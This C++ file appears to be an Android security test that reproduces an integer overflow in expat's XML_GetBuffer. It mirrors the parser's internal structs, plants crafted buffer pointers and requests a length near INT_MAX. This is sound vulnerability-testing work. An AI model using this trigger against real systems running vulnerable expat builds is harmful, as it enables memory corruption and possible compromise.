/*
 * Copyright (C) 2024 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <unistd.h>

#include <climits>
#include <cstdlib>
#include <vector>

#include "common.h"
#include "expat.h"
#include "expat_config.h"
#include "expat_external.h"
#include "internal.h"
#include "xmlrole.h"

constexpr long kMaxEntries = 1024 * 1024;

// Defining 'kBufferSize' such that 'kBufferPtrOffset' is greater than XML_CONTENT_BYTES, but still
// within a valid memory region. Defining end offset to be after the pointer offset.
constexpr size_t kBufferSize = XML_CONTEXT_BYTES + 2;
constexpr size_t kBufferPtrOffset = kBufferSize - 1;
constexpr size_t kBufferEndOffset = kBufferPtrOffset + 1;

// Setting 'kBufferLength' such that value of 'neededSize' defined in external/expat/lib/xmlparse.c
// is INT_MAX so that an integer overflow check on 'neededSize' is avoided so that control reaches
// the line 'neededSize += keep;'.
constexpr size_t kBufferLength = INT_MAX - (kBufferEndOffset - kBufferPtrOffset);

// The following structure definitions mirror the definitions with the same names in the file
// external/expat/lib/xmlparse.c.
// The test declares these structures explicitly because their definitions live only in the
// vulnerable source file and hence can't be included in the PoC directly.

// Mirror of the Processor function type from xmlparse.c. It is needed here only to declare the
// m_processor member of XML_ParserStruct; the signature must stay identical to the library's.
typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start, const char *end,
                                         const char **endPtr);

// Mirror of BINDING from xmlparse.c. Member order and types must match the library's definition.
// NOTE(review): assumed to match the expat revision under test — re-check when expat changes.
typedef struct binding {
    struct prefix *prefix;
    struct binding *nextTagBinding;
    struct binding *prevPrefixBinding;
    const struct attribute_id *attId;
    XML_Char *uri;
    int uriLen;
    int uriAlloc;
} BINDING;

// Mirror of PREFIX from xmlparse.c; member order and types must match the library's definition.
typedef struct prefix {
    const XML_Char *name;
    BINDING *binding;
} PREFIX;

// Mirror of ENTITY from xmlparse.c; member order and types must match the library's definition.
typedef struct {
    const XML_Char *name;
    const XML_Char *textPtr;
    int textLen;   /* length in XML_Chars */
    int processed; /* # of processed bytes - when suspended */
    const XML_Char *systemId;
    const XML_Char *base;
    const XML_Char *publicId;
    const XML_Char *notation;
    XML_Bool open;
    XML_Bool is_param;
    XML_Bool is_internal; /* true if declared in internal subset outside PE */
} ENTITY;

// Mirror of OPEN_INTERNAL_ENTITY from xmlparse.c; member order and types must match the
// library's definition.
typedef struct open_internal_entity {
    const char *internalEventPtr;
    const char *internalEventEndPtr;
    struct open_internal_entity *next;
    ENTITY *entity;
    int startTagLevel;
    XML_Bool betweenDecl; /* WFC: PE Between Declarations */
} OPEN_INTERNAL_ENTITY;

// Mirror of ATTRIBUTE_ID from xmlparse.c; member order and types must match the library's
// definition.
typedef struct attribute_id {
    XML_Char *name;
    PREFIX *prefix;
    XML_Bool maybeTokenized;
    XML_Bool xmlns;
} ATTRIBUTE_ID;

// Mirror of DEFAULT_ATTRIBUTE from xmlparse.c; member order and types must match the library's
// definition.
typedef struct {
    const ATTRIBUTE_ID *id;
    XML_Bool isCdata;
    const XML_Char *value;
} DEFAULT_ATTRIBUTE;

// Mirror of ELEMENT_TYPE from xmlparse.c; member order and types must match the library's
// definition.
typedef struct {
    const XML_Char *name;
    PREFIX *prefix;
    const ATTRIBUTE_ID *idAtt;
    int nDefaultAtts;
    int allocDefaultAtts;
    DEFAULT_ATTRIBUTE *defaultAtts;
} ELEMENT_TYPE;

// Mirror of CONTENT_SCAFFOLD from xmlparse.c; member order and types must match the library's
// definition.
typedef struct {
    enum XML_Content_Type type;
    enum XML_Content_Quant quant;
    const XML_Char *name;
    int firstchild;
    int lastchild;
    int childcnt;
    int nextsib;
} CONTENT_SCAFFOLD;

// Mirror of BLOCK from xmlparse.c; member order and types must match the library's definition.
// NOTE(review): 's' is a one-element trailing array; presumably the library over-allocates it —
// this test never touches it.
typedef struct block {
    struct block *next;
    int size;
    XML_Char s[1];
} BLOCK;

// Mirror of STRING_POOL from xmlparse.c; member order and types must match the library's
// definition (embedded by value in DTD and XML_ParserStruct, so its size affects their layout).
typedef struct {
    BLOCK *blocks;
    BLOCK *freeBlocks;
    const XML_Char *end;
    XML_Char *ptr;
    XML_Char *start;
    const XML_Memory_Handling_Suite *mem;
} STRING_POOL;

typedef const XML_Char *KEY;

// Mirror of NAMED from xmlparse.c; member order and types must match the library's definition.
typedef struct {
    KEY name;
} NAMED;

// Mirror of HASH_TABLE from xmlparse.c; member order and types must match the library's
// definition (embedded by value in DTD, so its size affects DTD's layout).
typedef struct {
    NAMED **v;
    unsigned char power;
    size_t size;
    size_t used;
    const XML_Memory_Handling_Suite *mem;
} HASH_TABLE;

// Mirror of DTD from xmlparse.c; member order and types must match the library's definition.
// NOTE(review): the XML_DTD-guarded members must be present exactly when the library itself was
// built with XML_DTD — assumed to come from the same expat_config.h; confirm.
typedef struct {
    HASH_TABLE generalEntities;
    HASH_TABLE elementTypes;
    HASH_TABLE attributeIds;
    HASH_TABLE prefixes;
    STRING_POOL pool;
    STRING_POOL entityValuePool;
    /* false once a parameter entity reference has been skipped */
    XML_Bool keepProcessing;
    /* true once an internal or external PE reference has been encountered;
       this includes the reference to an external subset */
    XML_Bool hasParamEntityRefs;
    XML_Bool standalone;
#ifdef XML_DTD
    /* indicates if external PE has been read */
    XML_Bool paramEntityRead;
    HASH_TABLE paramEntities;
#endif /* XML_DTD */
    PREFIX defaultPrefix;
    /* === scaffolding for building content model === */
    XML_Bool in_eldecl;
    CONTENT_SCAFFOLD *scaffold;
    unsigned contentStringLen;
    unsigned scaffSize;
    unsigned scaffCount;
    int scaffLevel;
    int *scaffIndex;
} DTD;

// Mirror of TAG_NAME from xmlparse.c; member order and types must match the library's definition
// (embedded by value in TAG).
typedef struct {
    const XML_Char *str;
    const XML_Char *localPart;
    const XML_Char *prefix;
    int strLen;
    int uriLen;
    int prefixLen;
} TAG_NAME;

// Mirror of TAG from xmlparse.c; member order and types must match the library's definition.
typedef struct tag {
    struct tag *parent;  /* parent of this element */
    const char *rawName; /* tagName in the original encoding */
    int rawNameLength;
    TAG_NAME name; /* tagName in the API encoding */
    char *buf;     /* buffer for name components */
    char *bufEnd;  /* end of the buffer */
    BINDING *bindings;
} TAG;

// Mirror of NS_ATT from xmlparse.c; member order and types must match the library's definition.
typedef struct {
    unsigned long version;
    unsigned long hash;
    const XML_Char *uriName;
} NS_ATT;

// Mirrors of the XML_DTD-only accounting types from xmlparse.c. They are embedded by value at the
// end of XML_ParserStruct, so they contribute to sizeof(struct XML_ParserStruct).
// NOTE(review): assumes XML_DTD here matches the library build configuration — confirm.
#ifdef XML_DTD
typedef unsigned long long XmlBigCount;
typedef struct accounting {
    XmlBigCount countBytesDirect;
    XmlBigCount countBytesIndirect;
    int debugLevel;
    float maximumAmplificationFactor; // >=1.0
    unsigned long long activationThresholdBytes;
} ACCOUNTING;

typedef struct entity_stats {
    unsigned int countEverOpened;
    unsigned int currentDepth;
    unsigned int maximumDepthSeen;
    int debugLevel;
} ENTITY_STATS;
#endif

// Mirror of struct XML_ParserStruct from xmlparse.c.
// main() writes m_buffer, m_bufferPtr, m_bufferEnd and m_bufferLim through this definition. It
// also requires sizeof(struct XML_ParserStruct) to equal the size of the parser allocation
// recorded by xml_malloc(). Every member must therefore match the library's layout, including the
// conditionally compiled XML_ATTR_INFO / XML_DTD members.
// NOTE(review): assumed to match the expat revision under test — re-check when expat changes.
struct XML_ParserStruct {
    /* The first member must be m_userData so that the XML_GetUserData
        macro works. */
    void *m_userData;
    void *m_handlerArg;
    char *m_buffer;
    const XML_Memory_Handling_Suite m_mem;
    /* first character to be parsed */
    const char *m_bufferPtr;
    /* past last character to be parsed */
    char *m_bufferEnd;
    /* allocated end of m_buffer */
    const char *m_bufferLim;
    XML_Index m_parseEndByteIndex;
    const char *m_parseEndPtr;
    XML_Char *m_dataBuf;
    XML_Char *m_dataBufEnd;
    XML_StartElementHandler m_startElementHandler;
    XML_EndElementHandler m_endElementHandler;
    XML_CharacterDataHandler m_characterDataHandler;
    XML_ProcessingInstructionHandler m_processingInstructionHandler;
    XML_CommentHandler m_commentHandler;
    XML_StartCdataSectionHandler m_startCdataSectionHandler;
    XML_EndCdataSectionHandler m_endCdataSectionHandler;
    XML_DefaultHandler m_defaultHandler;
    XML_StartDoctypeDeclHandler m_startDoctypeDeclHandler;
    XML_EndDoctypeDeclHandler m_endDoctypeDeclHandler;
    XML_UnparsedEntityDeclHandler m_unparsedEntityDeclHandler;
    XML_NotationDeclHandler m_notationDeclHandler;
    XML_StartNamespaceDeclHandler m_startNamespaceDeclHandler;
    XML_EndNamespaceDeclHandler m_endNamespaceDeclHandler;
    XML_NotStandaloneHandler m_notStandaloneHandler;
    XML_ExternalEntityRefHandler m_externalEntityRefHandler;
    XML_Parser m_externalEntityRefHandlerArg;
    XML_SkippedEntityHandler m_skippedEntityHandler;
    XML_UnknownEncodingHandler m_unknownEncodingHandler;
    XML_ElementDeclHandler m_elementDeclHandler;
    XML_AttlistDeclHandler m_attlistDeclHandler;
    XML_EntityDeclHandler m_entityDeclHandler;
    XML_XmlDeclHandler m_xmlDeclHandler;
    const ENCODING *m_encoding;
    INIT_ENCODING m_initEncoding;
    const ENCODING *m_internalEncoding;
    const XML_Char *m_protocolEncodingName;
    XML_Bool m_ns;
    XML_Bool m_ns_triplets;
    void *m_unknownEncodingMem;
    void *m_unknownEncodingData;
    void *m_unknownEncodingHandlerData;
    void(XMLCALL *m_unknownEncodingRelease)(void *);
    PROLOG_STATE m_prologState;
    Processor *m_processor;
    enum XML_Error m_errorCode;
    const char *m_eventPtr;
    const char *m_eventEndPtr;
    const char *m_positionPtr;
    OPEN_INTERNAL_ENTITY *m_openInternalEntities;
    OPEN_INTERNAL_ENTITY *m_freeInternalEntities;
    XML_Bool m_defaultExpandInternalEntities;
    int m_tagLevel;
    ENTITY *m_declEntity;
    const XML_Char *m_doctypeName;
    const XML_Char *m_doctypeSysid;
    const XML_Char *m_doctypePubid;
    const XML_Char *m_declAttributeType;
    const XML_Char *m_declNotationName;
    const XML_Char *m_declNotationPublicId;
    ELEMENT_TYPE *m_declElementType;
    ATTRIBUTE_ID *m_declAttributeId;
    XML_Bool m_declAttributeIsCdata;
    XML_Bool m_declAttributeIsId;
    DTD *m_dtd;
    const XML_Char *m_curBase;
    TAG *m_tagStack;
    TAG *m_freeTagList;
    BINDING *m_inheritedBindings;
    BINDING *m_freeBindingList;
    int m_attsSize;
    int m_nSpecifiedAtts;
    int m_idAttIndex;
    ATTRIBUTE *m_atts;
    NS_ATT *m_nsAtts;
    unsigned long m_nsAttsVersion;
    unsigned char m_nsAttsPower;
#ifdef XML_ATTR_INFO
    XML_AttrInfo *m_attInfo;
#endif
    POSITION m_position;
    STRING_POOL m_tempPool;
    STRING_POOL m_temp2Pool;
    char *m_groupConnector;
    unsigned int m_groupSize;
    XML_Char m_namespaceSeparator;
    XML_Parser m_parentParser;
    XML_ParsingStatus m_parsingStatus;
#ifdef XML_DTD
    XML_Bool m_isParamEntity;
    XML_Bool m_useForeignDTD;
    enum XML_ParamEntityParsing m_paramEntityParsing;
#endif
    unsigned long m_hash_secret_salt;
#ifdef XML_DTD
    ACCOUNTING m_accounting;
    ENTITY_STATS m_entity_stats;
#endif
};

// Parser instance under test; main() creates it with XML_ParserCreate_MM() and releases it.
XML_Parser parser = nullptr;

// Bookkeeping record for a single allocation made through xml_malloc().
struct mem_struct_t {
    void *mem_ptr;    // address returned by malloc() (recorded even when it is null)
    size_t mem_size;  // number of bytes that were requested
};

// Fixed-capacity table of allocations recorded by xml_malloc(). Only the first
// 'xml_malloc_list_size' entries hold meaningful data.
mem_struct_t xml_malloc_list[kMaxEntries];
static int xml_malloc_list_size{0};

void *xml_malloc(size_t size) {
    void *ptr = malloc(size);
    if (xml_malloc_list_size < kMaxEntries) {
        xml_malloc_list[xml_malloc_list_size].mem_ptr = ptr;
        xml_malloc_list[xml_malloc_list_size].mem_size = size;
        ++xml_malloc_list_size;
    }
    return ptr;
}

bool match_allocation_size(void *target_ptr, int target_size) {
    for (int i = 0; i < xml_malloc_list_size; ++i) {
        if (target_ptr == xml_malloc_list[i].mem_ptr &&
            target_size == xml_malloc_list[i].mem_size) {
            return true;
        }
    }
    return false;
}

int main() {
    XML_Memory_Handling_Suite memsuite = {};
    memsuite.malloc_fcn = xml_malloc;
    memsuite.realloc_fcn = realloc;
    memsuite.free_fcn = free;
    parser = XML_ParserCreate_MM(nullptr, &memsuite, nullptr);
    FAIL_CHECK(parser);

    bool match_found = match_allocation_size(parser, sizeof(struct XML_ParserStruct));
    FAIL_CHECK(match_found);

    std::vector<char> m_buffervector(kBufferSize);
    parser->m_buffer = m_buffervector.data();
    FAIL_CHECK(parser->m_buffer);

    parser->m_bufferPtr = parser->m_buffer + kBufferPtrOffset;
    parser->m_bufferEnd = parser->m_buffer + kBufferEndOffset;
    parser->m_bufferLim = parser->m_bufferEnd + 1;

    XML_GetBuffer(parser, kBufferLength);

    if (parser) {
        free(parser);
        parser = nullptr;
    }
    return EXIT_SUCCESS;
}
